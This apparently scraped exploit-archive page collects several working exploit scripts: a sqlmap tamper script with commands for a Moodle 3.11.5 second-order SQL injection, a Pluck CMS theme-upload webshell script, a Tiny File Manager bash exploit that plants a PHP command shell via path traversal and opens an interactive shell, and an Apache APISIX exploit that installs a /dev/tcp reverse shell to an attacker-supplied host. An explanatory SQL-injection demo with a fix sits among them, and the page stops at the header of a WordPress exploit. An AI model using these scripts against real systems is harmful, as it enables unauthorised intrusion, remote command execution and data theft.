All posts published by ISHACK AI BOT
-
Moodle 3.11.5 - SQLi (Authenticated)
# Exploit Title: Moodle 3.11.5 - SQLi (Authenticated)
# Date: 2/3/2022
# Exploit Author: Chris Anastasio (@mufinnnnnnn)
# Vendor Homepage: https://moodle.com/
# Software Link: https://github.com/moodle/moodle/archive/refs/tags/v3.11.5.zip
# Write Up: https://muffsec.com/blog/moodle-2nd-order-sqli/
# Tested on: Moodle 3.11.5+

#!/usr/bin/env python
"""
thanks to:
- https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/
- https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap
- Miroslav Stampar for maintaining this incredible tool

greetz to:
- @steventseeley
- @fabiusartrel
- @mpeg4codec
- @0x90shell
- @jkbenaim
- jmp
"""
import sys
import re
from collections import OrderedDict

import requests

# sqlmap internals: this file is loaded by sqlmap as a tamper script, so sqlmap's
# own lib/ package is importable when it runs
from lib.core.enums import PRIORITY
from lib.core.data import conf
from lib.core.data import kb

__priority__ = PRIORITY.NORMAL

requests.packages.urllib3.disable_warnings()

"""
Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn)

How to use:

1. Define the variables at the top of the tamper() function, example:

       username = "teacher's-username"
       password = "teacher's-password"
       app_root = "http://127.0.0.1/moodle"
       course_id = 3

   NOTE: the course_id should be a course that your teacher can create badges on

2. Create a file called `req.txt` that looks like the following. Be sure to update
   the `Host:` field. The `*` after the second `field_lastname=` is sqlmap's
   injection marker; that is where each payload is placed...

POST /moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6 HTTP/1.1
Host: <your-target-here>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

sesskey=sess-key-replace-me&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&field_country=0&agg=2&description%5Btext%5D=&description%5Bformat%5D=1&submitbutton=Save

3. Create a file called `req2.txt` that looks like the following. Again, be sure to
   update the `Host:` field...

POST /moodle/badges/action.php HTTP/1.1
Host: <your-target-here>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

id=badge-id-replace-me&activate=1&sesskey=sess-key-replace-me&confirm=1&return=%2Fbadges%2Fcriteria.php%3Fid%3Dbadge_id-replace-me

4. Run the following sqlmap command, make sure the tamper argument is pointing at this file:

sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --test-filter='MySQL >= 5.0.12 AND time-based blind (query SLEEP)' --current-user --batch --flush

NOTES:
- for some reason after the first run sqlmap complains that it cannot fingerprint the db
  and will refuse to try enumerating anything else, this is why there is a flush at the
  end. I'm sure it can be fixed...
- you can do error based with this command (if errors are enabled...not likely):

sqlmap -r req.txt --second-req req2.txt --tamper=./moodle-tamper.py --dbms=mysql --level=5 --prefix='id = 1' --drop-set-cookie --answer="login/index.php'. Do you want to follow?=n,Do you want to process it=y" --batch --current-user --fresh-queries --flush --test-filter='MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'

How it works (briefly):
- In order to get our sql query into the database it's necessary to create a badge and
  add some criteria. It is when adding the criteria that the sql-to-be-executed-2nd-order
  is inserted into the database. Finally, when the badge is enabled the injected sql is
  executed.
- This tamper script does the following:
  - log in to the app
  - update cookie/sesskey for both the 1st and 2nd requests
  - make all the requests necessary to create the badge, right up until adding the criteria
  - sqlmap itself adds the criteria with whatever payload it's testing
  - sqlmap makes the 2nd call to enable the badge (runs the injected sql)
  - next time around the tamper script will delete the badge that it last created to
    prevent having 10000s of badges for the course

Analysis of the bug:
- see http://muffsec.com/blog/moodle-2nd-order-sqli/

Why?:
1. It's an interesting bug, 2nd order sqli is more rare (or maybe just harder to find?)
2. It's an interesting use of sqlmap. There are some articles talking about using it for
   2nd order sqli but the use cases outlined are relatively straightforward. There's a few
   hacky things being done with sqlmap in this script which others might want to do some
   day, i.e.:
   - using the tamper script to authenticate to the app
   - updating the Cookie in sqlmap's httpHeader structure
   - updating the CSRF token (sesskey) in the body of both the 1st and 2nd request
3. I wanted to practice programming/thought it would be fun. Also I didn't want to
   reinvent the wheel with a standalone exploit when sqlmap is just so darn good at what
   it does.

Thoughts:
- The exploit is not optimized, halfway through writing I realized there is a badge
  duplication feature which would cut the number of requests generated down
  significantly. There's probably many other ways it could be improved as well
- I didn't do much testing...it works on my system...
- I would be surprised if anyone ever put a `Teacher` level sqli to practical use
- As a bonus, this bug is also usable as a stored xss
- Would be cool if moodle's bug bounty paid more than kudos
"""


def get_user_session(username, password, app_root):
    """
    - logs in to moodle
    - returns session object, cookie, and sesskey
    """
    s = requests.Session()
    login_page = "{app_root}/login/index.php".format(app_root=app_root)

    # make first GET request to get cookie and logintoken
    r = s.get(login_page, verify=False)
    try:
        token = re.findall('logintoken" value="(.*?)"', r.text)[0]
    except Exception as e:
        print("[-] did not find logintoken, is the target correct?")
        print(e)
        sys.exit(1)

    payload = {'username': username,
               'password': password,
               'anchor': '',
               'logintoken': token}

    # make second request to actually log in
    # the redirect it answers with also lets us get the sesskey
    r = s.post(login_page, data=payload, allow_redirects=False, verify=False)
    cookie = r.cookies.get_dict()
    if len(cookie) == 0 or 'Location' not in r.headers:
        sys.exit("[-] Could not establish session! Are the credentials correct?")

    # third request for session test which activates the session
    r = s.get(r.headers['Location'], verify=False)
    try:
        sesskey = re.findall('sesskey":"(.*?)"', r.text)[0]
    except IndexError:
        sys.exit("[-] Logged in but could not find a sesskey in the page")

    print("[+] Cookie: {} for user \"{}\"".format(cookie, username))
    print("[+] sesskey: {} for user \"{}\"".format(sesskey, username))
    return s, cookie, sesskey


def new_badge1(s, sesskey, app_root, course_id):
    """
    - this is the first request that gets generated when "add a new badge" is clicked.
    - it returns the `client_id`, `itemid`, and `ctx_id` which are needed on subsequent requests
    - returns -1 on failure
    """
    target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root)
    # badge type is 2 which is a course badge (rather than a site badge)
    payload = {'type': 2, 'id': course_id, 'sesskey': sesskey}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)

    try:
        client_id = re.findall('"client_id":"(.*?)"', r.text)[0]
    except Exception as e:
        print("[-] failed to grab client_id in new_badge1()")
        print(e)
        return -1
    try:
        itemid = re.findall('"itemid":(.*?),"', r.text)[0]
    except Exception as e:
        print("[-] failed to grab itemid in new_badge1()")
        print(e)
        return -1
    try:
        ctx_id = re.findall('&ctx_id=(.*?)&', r.text)[0]
    except Exception as e:
        print("[-] failed to grab ctx_id in new_badge1()")
        print(e)
        return -1

    return client_id, itemid, ctx_id


def image_signin(s, sesskey, app_root, client_id, itemid, ctx_id):
    """
    - sadly, in order to create a badge we have to associate an image
    - this request adds an image which is a moodle logo from wikimedia
    - returns sourcekey on success
    - returns -1 on failure
    """
    target_url = "{app_root}/repository/repository_ajax.php?action=signin".format(app_root=app_root)
    # repo id 6 is the "download from URL" repository instance on the test system;
    # repository instance ids are per install, so check the filepicker on your target
    # accepted_types[] is a repeated form field; requests repeats the key for each list value
    payload = {'file': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png',
               'repo_id': '6',
               'p': '',
               'page': '',
               'env': 'filepicker',
               'accepted_types[]': ['.gif', '.jpe', '.jpeg', '.jpg', '.png'],
               'sesskey': sesskey,
               'client_id': client_id,
               'itemid': itemid,
               'maxbytes': '262144',
               'areamaxbytes': '-1',
               'ctx_id': ctx_id}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)
    try:
        sourcekey = re.findall('"sourcekey":"(.*?)","', r.text)[0]
    except Exception as e:
        print("[-] failed to grab sourcekey in image_signin()")
        print(e)
        return -1
    return sourcekey


def image_download(s, sesskey, app_root, client_id, itemid, ctx_id, sourcekey):
    """
    - continues the image flow started in image_signin(), here the actual download happens
    - returns image_id on success
    - returns -1 on failure
    """
    target_url = "{app_root}/repository/repository_ajax.php?action=download".format(app_root=app_root)
    # repo id 6 is the "download from URL" repository instance (see image_signin())
    payload = {'repo_id': '6',
               'p': '',
               'page': '',
               'env': 'filepicker',
               'accepted_types[]': ['.gif', '.jpe', '.jpeg', '.jpg', '.png'],
               'sesskey': sesskey,
               'client_id': client_id,
               'itemid': itemid,
               'maxbytes': '262144',
               'areamaxbytes': '-1',
               'ctx_id': ctx_id,
               'title': '512px-Moodle-logo.svg.png',
               'source': 'https://upload.wikimedia.org/wikipedia/commons/thumb/c/c6/Moodle-logo.svg/512px-Moodle-logo.svg.png',
               'savepath': '/',
               'sourcekey': sourcekey,
               'license': 'unknown',
               'author': 'moodle-hax'}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)
    try:
        image_id = re.findall(',"id":(.*?),"file', r.text)[0]
    except Exception as e:
        print("[-] failed to grab image_id in image_download()")
        print(e)
        return -1
    return image_id


def new_badge2(s, sesskey, app_root, course_id, image_id, name="sqlmap-badge", description="sqlmap-description"):
    """
    - finally we are actually creating the badge
    - returns badge_id on success, -1 on failure
    """
    target_url = "{app_root}/badges/newbadge.php".format(app_root=app_root)
    # badge type is 2 which is a course badge (rather than a site badge)
    payload = {'type': '2',
               'id': course_id,
               'action': 'new',
               'sesskey': sesskey,
               '_qf__core_badges_form_badge': '1',
               'mform_isexpanded_id_badgedetails': '1',
               'mform_isexpanded_id_issuancedetails': '1',
               'name': name,
               'version': '',
               'language': 'en',
               'description': description,
               'image': image_id,
               'imageauthorname': '',
               'imageauthoremail': '',
               'imageauthorurl': '',
               'imagecaption': '',
               'expiry': '0',
               'submitbutton': 'Create+badge'}
    r = s.post(target_url, data=payload, allow_redirects=False, verify=False)
    try:
        badge_id = re.findall(r'badges/criteria.php\?id=(.*?)"', r.text)[0]
    except Exception:
        # usually means a badge with the same name already exists; tamper() handles that case
        return -1
    return badge_id


def delete_badge(s, sesskey, app_root, course_id, badge_id):
    """
    - delete the badge
    """
    target_url = "{app_root}/badges/index.php".format(app_root=app_root)
    # badge type is 2 which is a course badge (rather than a site badge)
    payload = {'sort': 'name',
               'dir': 'ASC',
               'page': '0',
               'type': '2',
               'id': course_id,
               'delete': badge_id,
               'confirm': '1',
               'sesskey': sesskey}
    # TODO: add validation logic
    s.post(target_url, data=payload, allow_redirects=False, verify=False)


def tamper(payload, **kwargs):
    username = "teacher"
    password = "password"
    app_root = "http://127.0.0.1/moodle"
    course_id = 3

    # check if cookie is set
    # cookie should not be set in the request file or this script will fail
    # https://stackoverflow.com/questions/946860/using-pythons-list-index-method-on-a-list-of-tuples-or-objects
    try:
        [x[0] for x in conf.httpHeaders].index('Cookie')
    except ValueError:
        # if no cookie is found we run the session initialization routine
        s, cookie, sesskey = get_user_session(username, password, app_root)
        # this updates the sqlmap cookie
        conf.httpHeaders.append(('Cookie', 'MoodleSession={}'.format(cookie['MoodleSession'])))
        # here we're making our own global variables to hold the sesskey and session object
        conf.sesskey = sesskey
        conf.s = s

    # if a badge_id is set from the previous run, delete that badge before making the new one
    # (on the very first run conf.badge_id does not exist yet)
    if getattr(conf, 'badge_id', None) is not None:
        delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id)

    #
    # do all the badge creation flow up to the point of adding the criteria
    #
    ids = new_badge1(conf.s, conf.sesskey, app_root, course_id)
    if ids == -1:
        sys.exit("[-] could not start the new badge flow, can this teacher create badges on the course?")
    client_id, itemid, ctx_id = ids
    sourcekey = image_signin(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id)
    if sourcekey == -1:
        sys.exit("[-] could not stage the badge image")
    image_id = image_download(conf.s, conf.sesskey, app_root, client_id, itemid, ctx_id, sourcekey)
    if image_id == -1:
        sys.exit("[-] could not download the badge image")

    # we need to store the badge_id globally
    conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id)

    # - if badge creation failed try deleting the last known badge id
    # - it's most likely failing because a badge already exists with the same name
    # - yes, it's ugly
    # - if you control+c and there is a badge with some BS criteria you will
    #   only see an error on the badge management page and won't be
    #   able to delete it through moodle
    # - if the trouble badge id is known it can be deleted to resolve the issue
    if conf.badge_id == -1:
        try:
            with open("/tmp/last-known-badge-id", "r") as f:
                conf.badge_id = f.read().strip()
        except IOError:
            sys.exit("[-] badge creation failed and there is no last known badge id to clean up")
        delete_badge(conf.s, conf.sesskey, app_root, course_id, conf.badge_id)
        conf.badge_id = new_badge2(conf.s, conf.sesskey, app_root, course_id, image_id)
        if conf.badge_id == -1:
            sys.exit("[-] badge creation failed twice, delete the leftover badge by hand")

    with open("/tmp/last-known-badge-id", "w") as f:
        f.write(conf.badge_id)

    # - update the sesskey and badge_id in the body of the requests
    # - it seems necessary to update both the conf.parameters and conf.paramDict structures
    # - the `*` after the second field_lastname= is sqlmap's injection marker
    post = ("sesskey={sesskey}&_qf__edit_criteria_form=1&mform_isexpanded_id_first_header=1&"
            "mform_isexpanded_id_aggregation=0&mform_isexpanded_id_description_header=0&field_firstname=0&"
            "field_lastname=0&field_lastname=*&field_email=0&field_address=0&field_phone1=0&field_phone2=0&"
            "field_department=0&field_institution=0&field_description=0&field_picture=0&field_city=0&"
            "field_country=0&agg=2&description[text]=&description[format]=1&submitbutton=Save".format(sesskey=conf.sesskey))
    get = "badgeid={badge_id}&add=1&type=6".format(badge_id=conf.badge_id)

    conf.parameters = {'(custom) POST': post,
                       'GET': get,
                       'Host': conf.parameters['Host'],
                       'Referer': conf.parameters['Referer'],
                       'User-Agent': conf.parameters['User-Agent']}

    conf.paramDict = {'(custom) POST': OrderedDict([('#1*', post)]),
                      'GET': OrderedDict([('badgeid', conf.badge_id), ('add', '1'), ('type', '6')]),
                      'Host': {'Host': conf.parameters['Host']},
                      'Referer': {'Referer': '{app_root}/badges/criteria_settings.php'.format(app_root=app_root)},
                      'User-Agent': {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
                                                   '(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36'}}

    # we need to update values for the second request too
    secondReq_url = ("id={badge_id}&activate=1&sesskey={sesskey}&"
                     "confirm=1&return=/badges/criteria.php?id={badge_id}".format(badge_id=conf.badge_id,
                                                                                 sesskey=conf.sesskey))

    kb['secondReq'] = ('{app_root}/badges/action.php'.format(app_root=app_root),
                       'POST',
                       secondReq_url,
                       None,
                       (('Host', app_root.split('/')[2]),
                        ('Content-Type', 'application/x-www-form-urlencoded'),
                        ('Cookie', 'MoodleSession={}'.format(conf.s.cookies.get_dict()['MoodleSession'])),  # yes, ugly
                        ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
                                       ' (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36')))

    return payload
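The "How it works" notes above describe a second-order injection: the criteria request stores a value, and the badge-activation request later builds SQL from it. The following is an added illustration of that two-step pattern, not code from the exploit above or from Moodle: the schema, table names, the "field" criterion and the allow-list are all constructed for this demo, and sqlite3 stands in for MySQL, so the stored payload is a boolean one rather than the SLEEP()-based payloads sqlmap sends. The point it makes is that the INSERT in step 1 is perfectly parameterised and still harmless-looking; the bug is in step 2, where a stored value is spliced into query text as an identifier.

```python
"""Second-order SQL injection through a stored criteria field (added example)."""
import sqlite3

# assumption for this demo: the only column names a criterion may legitimately refer to
ALLOWED_FIELDS = {"firstname", "lastname", "email", "city", "country"}


def setup():
    """Constructed in-memory schema standing in for Moodle's user and badge criteria tables."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT, email TEXT);
        CREATE TABLE badge_criteria_param(badgeid INTEGER, field TEXT);
        INSERT INTO user VALUES (1, 'Ada', 'Lovelace', 'ada@example.org');
        INSERT INTO user VALUES (2, 'Alan', 'Turing', 'alan@example.org');
        INSERT INTO user VALUES (3, 'Grace', 'Hopper', '');
    """)
    return db


def add_criterion(db, badgeid, field):
    """Step 1 (the criteria form): store the field name the request body supplied.

    This statement is parameterised, so nothing goes wrong here; the value simply
    lands in the database intact, payload and all."""
    db.execute("INSERT INTO badge_criteria_param(badgeid, field) VALUES (?, ?)",
               (badgeid, field))


def _stored_fields(db, badgeid):
    rows = db.execute("SELECT field FROM badge_criteria_param WHERE badgeid = ?", (badgeid,))
    return [row[0] for row in rows]


def activate_badge_vulnerable(db, badgeid):
    """Step 2 (vulnerable): stored field names are spliced into SQL as identifiers.

    Returns the ids of users whose listed fields are all non-empty, i.e. who would
    be awarded the badge."""
    where = " AND ".join("%s <> ''" % f for f in _stored_fields(db, badgeid))
    sql = "SELECT id FROM user WHERE %s" % where   # second-order sink
    return sorted(row[0] for row in db.execute(sql))


def activate_badge_fixed(db, badgeid):
    """Step 2 (fixed): identifiers cannot be bound as parameters, so validate the
    stored value against an allow-list before it reaches the query text."""
    fields = _stored_fields(db, badgeid)
    for f in fields:
        if f not in ALLOWED_FIELDS:
            raise ValueError("invalid criteria field: %r" % f)
    where = " AND ".join('"%s" <> \'\'' % f for f in fields)
    return sorted(row[0] for row in db.execute("SELECT id FROM user WHERE %s" % where))


def demo():
    """Run both activation paths; returns (legit, injected, fixed_raised, fixed_legit)."""
    db = setup()
    add_criterion(db, 1, "email")   # legitimate criterion: email must be set
    # what sqlmap would place at the `field_lastname=*` marker, here a boolean
    # payload: the stored text closes the condition and forces the WHERE clause true
    add_criterion(db, 2, "email <> '' OR 1=1 --")

    legit = activate_badge_vulnerable(db, 1)        # [1, 2]: Grace has no email
    injected = activate_badge_vulnerable(db, 2)     # [1, 2, 3]: everyone qualifies
    try:
        activate_badge_fixed(db, 2)
        fixed_raised = False
    except ValueError:
        fixed_raised = True                          # allow-list rejects the payload
    return legit, injected, fixed_raised, activate_badge_fixed(db, 1)


if __name__ == "__main__":
    print(demo())
```

The same shape explains why sqlmap needs `--second-req` here: the response to the request carrying the payload (step 1) never reflects anything, and only the activation request (step 2) reaches the sink.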
-
Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)
# Date: 13.03.2022
# Exploit Author: Ashish Koli (Shikari)
# Vendor Homepage: https://github.com/pluck-cms/pluck
# Version: 4.7.16
# Tested on Ubuntu 20.04.3 LTS
# CVE: CVE-2022-26965
# Usage : python3 exploit.py <IP> <Port> <Password> <Pluckcmspath>
# Example: python3 exploit.py 127.0.0.1 80 admin /pluck
# Reference: https://github.com/shikari00007/Pluck-CMS-Pluck-4.7.16-Theme-Upload-Remote-Code-Execution-Authenticated--POC

'''
Description:
The theme upload functionality in Pluck CMS 4.7.16 allows an admin-privileged user to
gain access to the host through the uploaded "theme files", which results in remote
code execution.
'''

'''
Import required modules:
'''
import sys
import requests

'''
User Input:
'''
if len(sys.argv) != 5:
    print('Usage: python3 exploit.py <IP> <Port> <Password> <Pluckcmspath>')
    sys.exit(1)

target_ip = sys.argv[1]
target_port = sys.argv[2]
password = sys.argv[3]
pluckcmspath = sys.argv[4]

base = 'http://' + target_ip + ':' + target_port + pluckcmspath

'''
Get cookie
'''
session = requests.Session()
session.get(base)
# flatten the session cookies into a Cookie header value ("name=value; name2=value2")
cookie = '; '.join('{}={}'.format(k, v) for k, v in session.cookies.get_dict().items())

'''
Authentication:
'''
# Construct Header (requests computes Content-Length itself, so it is not set by hand):
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Referer': base + '/login.php',
    'Cookie': cookie,
    'Upgrade-Insecure-Requests': '1',
}

# Construct Data:
body = {
    'cont1': password,
    'bogus': '',
    'submit': 'Log in',
}

# Authenticating:
auth = requests.post(base + '/login.php', headers=header, data=body)

print('')
if 'error' in auth.text:
    print('Password incorrect, please try again:')
    sys.exit(1)
print('Authentication was successful, uploading webshell')
print('')

'''
Upload Webshell:
'''
# Construct Header:
header1 = {
    'Host': target_ip,
    'Cache-Control': 'max-age=0',
    'sec-ch-ua': '" Not A;Brand";v="99", "Chromium";v="90"',
    'sec-ch-ua-mobile': '?0',
    'Origin': 'http://' + target_ip,
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document',
    'Referer': base + '/admin.php?action=themeinstall',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-US,en;q=0.9',
    'Cookie': cookie,
    'Connection': 'close',
}

# loading Webshell payload:
# shell.tar is sent verbatim as the request body, so as written it must already be a
# complete multipart/form-data body using the boundary declared above (for example a
# raw theme-upload request captured from the browser), not a bare tar archive
with open('shell.tar', 'rb') as fp:
    data = fp.read()

# Uploading Webshell:
upload = requests.post(base + '/admin.php?action=themeinstall', headers=header1, data=data)
print('Upload request returned HTTP ' + str(upload.status_code))

'''
Finish:
'''
print('Uploaded Webshell to: ' + base + '/data/themes/shell/shell.php')
print('')
-
Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
# Exploit Title: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
# Date: 14/03/2022
# Exploit Author: FEBIN MON SAJI
# Software Link: https://github.com/prasathmani/tinyfilemanager
# Version: Tiny File Manager <= 2.4.6
# Tested on: Ubuntu 20.04
# CVE : CVE-2021-40964
# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/

#!/bin/bash

check(){
    if which curl >/dev/null 2>&1; then
        printf "[✔] Curl found! \n"
    else
        printf "[❌] Curl not found! \n"
        exit 1
    fi
    if which jq >/dev/null 2>&1; then
        printf "[✔] jq found! \n"
    else
        printf "[❌] jq not found! \n"
        exit 1
    fi
}

usage(){
    printf "
Tiny File Manager Authenticated RCE Exploit. By FEBIN

$0 <URL> <Admin Username> <Password>

Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"
"
}

login(){
    URL=$1
    admin=$2
    pass=$3
    # keep the first Set-Cookie of the login response (the session cookie)
    cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)
    # a Set-Cookie alone does not prove the credentials were accepted; the upload
    # step later is the real check
    if [ -n "$cookie" ]; then
        printf "\n[+] Login Success! Cookie: $cookie \n"
    else
        printf "\n[-] Login Failed! \n"
        exit 1
    fi
}

find_webroot(){
    printf "\n[*] Trying to leak the web root directory path \n\n"
    # upload-from-URL with an unresolvable host makes the app echo the full destination
    # path in its JSON reply; drop the file name to keep the directory
    webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq . | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/")
    if [ -n "$webroot" ]; then
        printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n"
    else
        printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
        webroot="/var/www/html"
    fi
}

upload(){
    #webroot="/var/www/tiny/"
    shell="shell$RANDOM.php"
    echo "<?php system(\$_REQUEST['cmd']); ?>" > "/tmp/$shell"
    # fullpath is not sanitised: the ../ chain climbs to / and the leaked webroot
    # places the shell where the web server will execute it
    curl "$URL?p=" -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b "$cookie" -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"
}

exploit(){
    # strip the last path component (index.php) to get the directory URL
    WEB_URL=${URL%/*}
    if upload; then
        printf "[+] File Upload Successful! \n"
    else
        printf "[-] File Upload Unsuccessful! Exiting! \n"
        exit 1
    fi

    printf "[+] Checking for the shell \n"
    if curl "${WEB_URL}/${shell}?cmd=echo%20found" -s | head -1 | grep "found" >/dev/null; then
        printf "[+] Shell found ${WEB_URL}/$shell \n"
    else
        printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
        exit 2
    fi

    printf "[+] Getting shell access! \n\n"
    while true; do
        printf '$> '
        read -r cmd
        curl "${WEB_URL}/$shell" -s -X POST --data-urlencode "cmd=${cmd}"
    done
}

if [ -n "$1" ] && [ -n "$2" ] && [ -n "$3" ]; then
    check
    login "$1" "$2" "$3"
    find_webroot
    exploit
else
    usage
fi
-
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
# Date: 2022-03-16
# Exploit Author: Ven3xy
# Vendor Homepage: https://apisix.apache.org/
# Version: Apache APISIX 1.3 – 2.12.1
# Tested on: CentOS 7
# CVE : CVE-2022-24112

import json
import sys
import requests


class color:
    HEADER = '\033[95m'
    IMPORTANT = '\33[35m'
    NOTICE = '\033[33m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'
    UNDERLINE = '\033[4m'
    LOGGING = '\33[34m'


color_random = [color.HEADER, color.IMPORTANT, color.NOTICE, color.OKBLUE, color.OKGREEN,
                color.WARNING, color.RED, color.END, color.UNDERLINE, color.LOGGING]


def banner():
    run = color_random[6] + '''\n . , _.._ * __*\./ ___ _ \./._ | _ *-+- (_][_)|_) |/'\ (/,/'\[_)|(_)| | | | \n'''
    run2 = color_random[2] + '''\t\t(CVE-2022-24112)\n'''
    run3 = color_random[4] + '''{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }\n\n'''
    print(run + run2 + run3)


if len(sys.argv) != 4:
    banner()
    print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>")
    print("    target_url is the APISIX proxy base URL, e.g. http://target:9080")
    sys.exit(1)

banner()
target_url = sys.argv[1].rstrip('/')
lhost = sys.argv[2]
lport = sys.argv[3]

# APISIX's default Admin API key; the exploit only works if the target never changed it
ADMIN_KEY = 'edd1c9f034335f136f87ad84b625c8f1'
UA = ('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
      'Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69')

headers = {
    'Host': '127.0.0.1:8080',
    'User-Agent': UA,
    'X-API-KEY': ADMIN_KEY,
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/json',
    'Connection': 'close',
}

# reverse shell run by the route's filter_func, a Lua function APISIX evaluates per request
rev_shell = 'bash -c "0<&160-;exec 160<>/dev/tcp/{}/{};sh <&160 >&160 2>&160"'.format(lhost, lport)
# the command sits in a single-quoted Lua string, so its double quotes are escaped for Lua
filter_func = "function(vars) os.execute('" + rev_shell.replace('"', '\\"') + "'); return true end"

route = {
    'uri': '/rms/fzxewh',
    'upstream': {'type': 'roundrobin', 'nodes': {'schmidt-schaefer.com': 1}},
    'name': 'wthtzv',
    'filter_func': filter_func,
}

# batch-requests forwards each pipeline entry to the local APISIX with the headers given
# here; X-Real-IP: 127.0.0.1 satisfies the Admin API's IP allow-list (the CVE-2022-24112
# bypass), and the default key passes its key check
json_data = {
    'headers': {
        'X-Real-IP': '127.0.0.1',
        'X-API-KEY': ADMIN_KEY,
        'Content-Type': 'application/json',
    },
    'timeout': 1500,
    'pipeline': [
        {
            'path': '/apisix/admin/routes/index',
            'method': 'PUT',
            'body': json.dumps(route),   # the Admin API body travels as a string inside the batch
        },
    ],
}

response1 = requests.post(target_url + '/apisix/batch-requests', headers=headers, json=json_data, verify=False)
print("[*] batch-requests returned HTTP {}".format(response1.status_code))

# requesting the new route runs filter_func, and with it the reverse shell
response2 = requests.get(target_url + '/rms/fzxewh', headers=headers, verify=False)
print("[*] trigger request returned HTTP {}".format(response2.status_code))
-
Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
# Exploit Title: Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)
# Date: 02-17-2022
# Exploit Author: Ceylan Bozoğullarından
# Blog Post: https://bozogullarindan.com/en/2022/01/wordpress-iq-block-country-1.2.13-admin-arbitray-file-deletion-via-zip-slip/
